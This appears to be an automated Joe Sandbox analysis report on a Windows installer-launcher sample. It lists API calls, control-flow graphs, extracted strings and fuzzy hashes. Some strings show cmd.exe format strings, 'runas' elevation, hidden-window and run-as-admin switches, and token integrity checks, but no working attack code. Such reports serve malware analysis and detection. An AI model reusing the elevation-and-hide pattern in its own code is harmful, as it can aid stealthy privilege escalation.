                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::locale::_$Locimp::_$AddfacLocimp_std::_$Lockit$H_prolog3Lockit::_$FreeInitLocalLocinfo::_Locinfo_ctorLockit::~_MakelocSetgloballocale__cftoe
                                                                                    • String ID: bad locale name
                                                                                    • API String ID: 3103716676-1405518554
                                                                                    • Opcode ID: 29f1d956c16516c6423db43a58112b32a7558a6408711e8475feeb9d2787133d
                                                                                    • Instruction ID: 6ef3f1a24ca99528284b0f9ac89842e4100d21527b6824db70c05eb046bff3cc
                                                                                    • Opcode Fuzzy Hash: 29f1d956c16516c6423db43a58112b32a7558a6408711e8475feeb9d2787133d
                                                                                    • Instruction Fuzzy Hash: 2DF1AD71D01249DFDF10CFA8D985BAEBBF5EF49304F2441A9E805AB381E7759A04CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 434 b357c0-b357df GetCurrentProcess OpenProcessToken 435 b357e1-b357e6 434->435 436 b357e7-b35814 GetTokenInformation 434->436 437 b35816-b3581b 436->437 438 b3581e-b3582e CloseHandle 436->438 437->438
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(00000008,?,5D8D6CBB,?,-00000010), ref: 00B357D0
                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00B357D7
                                                                                    • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00B3580C
                                                                                    • CloseHandle.KERNEL32(?), ref: 00B35822
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                    • String ID:
                                                                                    • API String ID: 215268677-0
                                                                                    • Opcode ID: 75a3e044cb6727cfb34133c24559f10072077edff46c12b270bbb2ed0b5c5ada
                                                                                    • Instruction ID: 5eb470c59dc80f1c1a94caecb92dac3434db2551d01d47b9f7763e685370c75b
                                                                                    • Opcode Fuzzy Hash: 75a3e044cb6727cfb34133c24559f10072077edff46c12b270bbb2ed0b5c5ada
                                                                                    • Instruction Fuzzy Hash: 8BF03074188301AFEB109F20EC49BAA7BE8FB44700F508859FD84D21A0DB79965CDB63
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetCommandLineW.KERNEL32(5D8D6CBB,?,?,?,?,?,?,?,?,?,00B756D5,000000FF), ref: 00B3CDE8
                                                                                      • Part of subcall function 00B31F80: LocalAlloc.KERNEL32(00000040,00000000,?,?,vector too long,00B34251,5D8D6CBB,00000000,?,00000000,?,?,?,00B74400,000000FF,?), ref: 00B31F9D
                                                                                    • ExitProcess.KERNEL32 ref: 00B3CEB1
                                                                                      • Part of subcall function 00B36600: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 00B3667E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocCommandCreateExitFileLineLocalProcess
                                                                                    • String ID: Full command line:
                                                                                    • API String ID: 1878577176-831861440
                                                                                    • Opcode ID: 5a53663ad3e12672afc536a5fb920600f48fea3bcd761df65be9c3a68807f993
                                                                                    • Instruction ID: 4cdff6b857aa35a38a43f1c7f31c0671110b3979abcad7e95e53e38654a90bb8
                                                                                    • Opcode Fuzzy Hash: 5a53663ad3e12672afc536a5fb920600f48fea3bcd761df65be9c3a68807f993
                                                                                    • Instruction Fuzzy Hash: DD21F471910214ABCB15FBB4CC46BEE77E5AF44740F2485A8F416AB292EF74AB08C791
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 471 b35e40-b35ebc GetTokenInformation 472 b35f20-b35f33 471->472 473 b35ebe-b35ec7 GetLastError 471->473 473->472 474 b35ec9-b35ed7 473->474 475 b35ed9-b35edc 474->475 476 b35ede 474->476 477 b35f0b 475->477 478 b35ee0-b35ee7 476->478 479 b35f0e-b35f1a GetTokenInformation 476->479 477->479 480 b35ef7-b35f08 call b54080 478->480 481 b35ee9-b35ef5 call b360d0 478->481 479->472 480->477 481->479
                                                                                    APIs
                                                                                    • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00B35E18,5D8D6CBB,?), ref: 00B35EB4
                                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,00000000,00000000,00B35E18,5D8D6CBB,?), ref: 00B35EBE
                                                                                    • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000000,00000000,?,TokenIntegrityLevel,00000000,00000000,00B35E18,5D8D6CBB,?), ref: 00B35F1A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: InformationToken$ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 2567405617-0
                                                                                    • Opcode ID: d790377f043fea553d44e5da518a26c6c01e243b8bcf5d7e6e6bbbaa76b06be1
                                                                                    • Instruction ID: b2522efc2714b927ec62c0a6a395ea9fc714cdbc98891a46e42b694a31bc73bc
                                                                                    • Opcode Fuzzy Hash: d790377f043fea553d44e5da518a26c6c01e243b8bcf5d7e6e6bbbaa76b06be1
                                                                                    • Instruction Fuzzy Hash: C1319171A00619EFD724CF58CC45BAFFBF9FB44714F20456EE415A7280DBB169048BA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 486 b670bb-b670c6 487 b670d4-b670da 486->487 488 b670c8-b670d2 486->488 490 b670f3-b67104 RtlAllocateHeap 487->490 491 b670dc-b670dd 487->491 488->487 489 b67108-b67113 call b57370 488->489 495 b67115-b67117 489->495 493 b67106 490->493 494 b670df-b670e6 call b65245 490->494 491->490 493->495 494->489 499 b670e8-b670f1 call b6bf83 494->499 499->489 499->490
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,?,?,00B6596A,00000001,00000364,?,00000006,000000FF,?,00B56CE7,00000000,00B63841,00000000), ref: 00B670FC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: eb805cbc8bc07d6219800a24ef6a79e995c9af5dea6d3d27e3d57f275951eef9
                                                                                    • Instruction ID: 98d217cda066b04387a317c16bf2cd7f6e8db193c152ad1e09a1d906a6eb83c2
                                                                                    • Opcode Fuzzy Hash: eb805cbc8bc07d6219800a24ef6a79e995c9af5dea6d3d27e3d57f275951eef9
                                                                                    • Instruction Fuzzy Hash: 86F0B4312CD220679B325A219C02F5A77DDEF52775B1440E2BC18EB190CE28EC0086F1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 502 b39910-b3998c call b40df9 call b38040 call b39730 508 b39991-b3999e 502->508 509 b399a0-b399ab 508->509 510 b399c5-b399f2 call b52937 508->510 511 b399ba-b399bc 509->511 512 b399ad-b399b8 509->512 511->510 515 b399be-b399bf LocalFree 511->515 512->511 514 b399f5-b39a87 call b57027 512->514 519 b39a89-b39a8d 514->519 520 b39a8f-b39a95 514->520 515->510 521 b39a99-b39a9e 519->521 520->521 522 b39aa0-b39aac 521->522 523 b39ae0-b39aea call b31bd0 522->523 524 b39aae-b39ac6 522->524 528 b39aef-b39b15 call b61144 523->528 525 b39ad8-b39ade 524->525 526 b39ac8-b39ad5 524->526 525->528 526->525 531 b39b17-b39b19 528->531 532 b39b1b-b39b22 528->532 531->522 533 b39b24-b39b2a 532->533 534 b39b2c-b39b2f 532->534 535 b39b32-b39b43 533->535 534->535 536 b39b45-b39b4a 535->536 537 b39b94-b39bcb call b32e60 call b52937 535->537 538 b39b89 536->538 539 b39b4c-b39b52 536->539 543 b39b8d-b39b92 538->543 541 b39b71-b39b79 539->541 542 b39b54-b39b5b 539->542 547 b39b7c-b39b87 541->547 542->541 545 b39b5d-b39b6f 542->545 543->536 543->537 545->547 547->538 547->543
                                                                                    APIs
                                                                                      • Part of subcall function 00B40DF9: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00B40E11
                                                                                      • Part of subcall function 00B39730: std::locale::_Init.LIBCPMT ref: 00B39763
                                                                                      • Part of subcall function 00B39730: std::_Lockit::_Lockit.LIBCPMT ref: 00B3978A
                                                                                      • Part of subcall function 00B39730: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00B397F0
                                                                                    • LocalFree.KERNEL32(00000000,00000000,?,00B854B1,00000000), ref: 00B399BF
                                                                                    • __cftoe.LIBCMT ref: 00B39B0B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_std::locale::_$FreeInitLocalLocimpLocimp::_Locinfo::_Locinfo_ctorLockitLockit::___cftoe
                                                                                    • String ID:
                                                                                    • API String ID: 810108568-0
                                                                                    • Opcode ID: 735f97edfdcfdb1ffa1e898a7224a27044a9f9dd9ff58093ca404994fca48bad
                                                                                    • Instruction ID: b5012a1724df526754f296df05828bcf4b8bdc1e4f3606e10fd0622815d01cd3
                                                                                    • Opcode Fuzzy Hash: 735f97edfdcfdb1ffa1e898a7224a27044a9f9dd9ff58093ca404994fca48bad
                                                                                    • Instruction Fuzzy Hash: 9A2180B09002499FEB14DF94C945BEEFBF5EB08710F20426DE415AB3C0DBB55A48CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 550 b36330-b3633c LocalAlloc
                                                                                    APIs
                                                                                    • LocalAlloc.KERNELBASE(00000040,?,00B40E04,00000020,?,?,00B39942,00000000,5D8D6CBB,?,?,?,?,00B750DD,000000FF), ref: 00B36336
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocLocal
                                                                                    • String ID:
                                                                                    • API String ID: 3494564517-0
                                                                                    • Opcode ID: 6f7f9347e0812f1ada6bb65fe6e0970eacff2ec7dfeaaf08786cea7a634f3613
                                                                                    • Instruction ID: ca25e8d0dfb11d5026b684daa6077a75b85d2111597f3469ceac16fb18d20cc6
                                                                                    • Opcode Fuzzy Hash: 6f7f9347e0812f1ada6bb65fe6e0970eacff2ec7dfeaaf08786cea7a634f3613
                                                                                    • Instruction Fuzzy Hash: 83A00275998200ABDE415B909E0BF097B61BB84B01F604C44F35D6A4A08E754450EB16
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000,?,?,?,?,?), ref: 00B3549C
                                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?), ref: 00B3551D
                                                                                    • ShellExecuteExW.SHELL32(?), ref: 00B35601
                                                                                    • ShellExecuteExW.SHELL32(?), ref: 00B35637
                                                                                    • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 00B3567C
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00B35685
                                                                                    • AllowSetForegroundWindow.USER32(00000000), ref: 00B3568B
                                                                                    • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 00B356AB
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00B356AE
                                                                                    • Sleep.KERNEL32(00000064,?,?,?,?,?,?), ref: 00B356CA
                                                                                    • EnumWindows.USER32(00B35830,?), ref: 00B356DF
                                                                                    • BringWindowToTop.USER32(00000000), ref: 00B356F4
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?), ref: 00B35711
                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00B3571B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$AddressExecuteForegroundHandleModuleProcShellWindows$AllowBringCodeDirectoryEnumExitObjectProcessSingleSleepWait
                                                                                    • String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$Directory:<$FilePath:<$GetProcessId$Hidden$Kernel32.dll$Parameters:<$ShellExecuteInfo members:$Verb:<$Visible$Window Visibility:$open$runas
                                                                                    • API String ID: 697762045-2796270252
                                                                                    • Opcode ID: cf8a85dbd2da0beb26ea7e9b65a002e35821accf6d94357b59fddcee281d9206
                                                                                    • Instruction ID: 9e1654bd1a3a7b1f2b0222b8f38c48421817684b8c57e730a2c7b880a1d6cf10
                                                                                    • Opcode Fuzzy Hash: cf8a85dbd2da0beb26ea7e9b65a002e35821accf6d94357b59fddcee281d9206
                                                                                    • Instruction Fuzzy Hash: BBE1B471A00A099BCB24EFA8C845BAEB7F5EF54710F6441A9E815EB3A1DB349D41CB50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00B3CBB6
                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00B8E6D0,00000800), ref: 00B3CBD3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: OpenQueryValue
                                                                                    • String ID: /DIR $/DontWait $/EnforcedRunAsAdmin $/HideWindow$/LogFile$/RunAsAdmin
                                                                                    • API String ID: 4153817207-482544602
                                                                                    • Opcode ID: 9e47fc758c932d55ea966ec062ac7a830aa2d61fe6baa829312e783b195080c6
                                                                                    • Instruction ID: 8e92773aa8c781ff571891b52a0f1de6e2d567c796642bd4c29721f3817f05dc
                                                                                    • Opcode Fuzzy Hash: 9e47fc758c932d55ea966ec062ac7a830aa2d61fe6baa829312e783b195080c6
                                                                                    • Instruction Fuzzy Hash: 6AC107356042168BCB35AF58C80137ABBE1FF54740FB984D9E889AB265FB71CD81C790
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 00B657CC: GetLastError.KERNEL32(?,00000008,00B6AD4C), ref: 00B657D0
                                                                                      • Part of subcall function 00B657CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B65872
                                                                                    • GetACP.KERNEL32(?,?,?,?,?,?,00B642D9,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00B6DEE5
                                                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00B642D9,?,?,?,00000055,?,-00000050,?,?), ref: 00B6DF10
                                                                                    • _wcschr.LIBVCRUNTIME ref: 00B6DFA4
                                                                                    • _wcschr.LIBVCRUNTIME ref: 00B6DFB2
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00B6E073
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                    • String ID: utf8
                                                                                    • API String ID: 4147378913-905460609
                                                                                    • Opcode ID: 75c1cd491c396ad666a2e7507a930b1951ce74e275ff271b51ed4f793fc5fa71
                                                                                    • Instruction ID: 33c25dce604dd239d420cb50c9c077ac32bc072fa57301804fc9990bd00d3bad
                                                                                    • Opcode Fuzzy Hash: 75c1cd491c396ad666a2e7507a930b1951ce74e275ff271b51ed4f793fc5fa71
                                                                                    • Instruction Fuzzy Hash: F671D475B00706AADB24AB74CC86BB773E8EF54700F1444E9F915DB181EBB9ED408B61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: __floor_pentium4
                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                    • API String ID: 4168288129-2761157908
                                                                                    • Opcode ID: d259276210f9efaeb8a9da374f0f5c535fb7ccfb9e0532a6fb6f35261316058d
                                                                                    • Instruction ID: 1d86ce892f3082f36112606f2b5107be7348f9466802b2a54e5a4156d118b725
                                                                                    • Opcode Fuzzy Hash: d259276210f9efaeb8a9da374f0f5c535fb7ccfb9e0532a6fb6f35261316058d
                                                                                    • Instruction Fuzzy Hash: 2FD22972E082298FDB65DE28DD807EAB7F5EB44305F1441EAD81DE7240DB78AE858F41
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,00B6E8D1,00000002,00000000,?,?,?,00B6E8D1,?,00000000), ref: 00B6E64C
                                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,00B6E8D1,00000002,00000000,?,?,?,00B6E8D1,?,00000000), ref: 00B6E675
                                                                                    • GetACP.KERNEL32(?,?,00B6E8D1,?,00000000), ref: 00B6E68A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoLocale
                                                                                    • String ID: ACP$OCP
                                                                                    • API String ID: 2299586839-711371036
                                                                                    • Opcode ID: 5916cafdafb1ca147f6945f187999f311b42f5eaa35ab4c16533ea30694ee42b
                                                                                    • Instruction ID: 02a9a078e402c898f1d6b2102a1658cfb2e8e026695ce2d952e934ff30474fa9
                                                                                    • Opcode Fuzzy Hash: 5916cafdafb1ca147f6945f187999f311b42f5eaa35ab4c16533ea30694ee42b
                                                                                    • Instruction Fuzzy Hash: 5121803A740201AADB34CF14C904A9777E6EB74B64B5684E4E92ADB110FB36EE41C750
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: _swprintf$FreeLocal
                                                                                    • String ID:
                                                                                    • API String ID: 2429749586-0
                                                                                    • Opcode ID: 06368b47ecd79e9e98f2f36bc9ba94b9916066e2c03c87df46d1212036a9be13
                                                                                    • Instruction ID: d90e5a9ab7113135e443207e7752f617e0afb65174dfe1d0d100185b6e21a73e
                                                                                    • Opcode Fuzzy Hash: 06368b47ecd79e9e98f2f36bc9ba94b9916066e2c03c87df46d1212036a9be13
                                                                                    • Instruction Fuzzy Hash: 1AF1AC71D00219ABDF19DFA8DC41BAEBBF5FF48300F244269F911AB280DB75A945CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 00B657CC: GetLastError.KERNEL32(?,00000008,00B6AD4C), ref: 00B657D0
                                                                                      • Part of subcall function 00B657CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B65872
                                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00B6E894
                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 00B6E8DD
                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 00B6E8EC
                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00B6E934
                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00B6E953
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                    • String ID:
                                                                                    • API String ID: 415426439-0
                                                                                    • Opcode ID: db3d6b4a069956a04b9ccb9a78f56c3b17d34ac2319487544c0418d681c76f1d
